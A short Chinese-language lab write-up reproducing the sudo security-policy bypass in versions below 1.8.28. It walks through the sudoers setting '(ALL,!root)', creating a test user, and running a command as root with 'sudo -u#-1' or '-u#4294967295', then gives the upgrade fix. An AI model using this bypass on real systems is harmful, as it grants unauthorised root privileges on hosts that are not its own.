Sudo是linux的系統命令,讓普通賬號以root方式執行命令
正常來說如果普通用戶需要用sudo,需要修改配置文件/etc/sudoers,將sudo使用權賦予該用戶
而這個漏洞使得普通用戶也可以繞過安全策略,執行敏感命令
漏洞影響的版本是<1.8.28
實驗環境:kali
漏洞復現過程
1、 查看sudo版本
Sudo –V
2、 修改配置文件:vim/etc/sudoers 在root(ALL:ALL)ALL添加一行
Test ALL=(ALL,!root)ALL
第一個ALL表示用戶可以在任意地方使用sudo
第二個(ALL,!root)表示命令可以被除了root以外的任意用戶執行
最后一個ALL表示允許被執行
整體代碼:test用戶可以使用sudo,是除了root以外的任意用戶去執行
注意:需要創建test用戶:useradd test passwd test
3、 切換到test用戶
Su test
然后sudo id(查看root的ID)
發現沒有權限執行
4、 使用以下方法去執行想要的執行的命令
Sudo –u#數字 命令
其中數字范圍:-1~4294967295,命令是系統命令
數字-1或者最大代表root用戶
修復方法:更新sudo版本>=1.8.28
該漏洞比較雞肋,需要管理員修改配置文件